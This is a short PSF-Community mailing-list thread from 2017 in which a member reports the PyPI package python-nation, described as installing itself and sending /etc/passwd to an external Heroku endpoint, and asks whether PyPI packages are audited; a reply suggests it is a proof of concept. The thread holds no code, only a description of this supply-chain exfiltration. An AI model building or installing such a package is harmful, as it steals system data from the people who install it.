Interesting detail, the mentioned package https://pypi.python.org/pypi/python-nation/1.0.1 was created and uploaded by Jacob Kaplan Moss, so I guess this is intended to be a POC, to show PyPI vulnerabilities or some Infosec experiment.

On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbruno@gmail.com> wrote:

Hi,

I just read this on reddit[0], a thread asking if PyPI packages are audited and somebody pointed the `python-nation`[1] which is a harmful and useless module, installing itself and sending the `/etc/passwd` content to external endpoint.

The app receiving the data is hosted at http://python-nation.herokuapp.com

and as the PSF mission [2] says 

The mission of the Python Software Foundation is to promote, protect, and advance the Python programming language

I wonder if there are some workgroup at PSF to handle this? and not only the specific case of `python-nation` which should be deleted and the user banned maybe, But also to handle the audit of other packages?

[0] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/

[1] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/

[2] https://www.python.org/psf/mission/

Cheers,

--

Bruno Rocha - @rochacbruno

http://brunorocha.org

--

Bruno Rocha - @rochacbruno

http://brunorocha.org

_______________________________________________
PSF-Community mailing list
PSF-Community@python.org
https://mail.python.org/mailman/listinfo/psf-community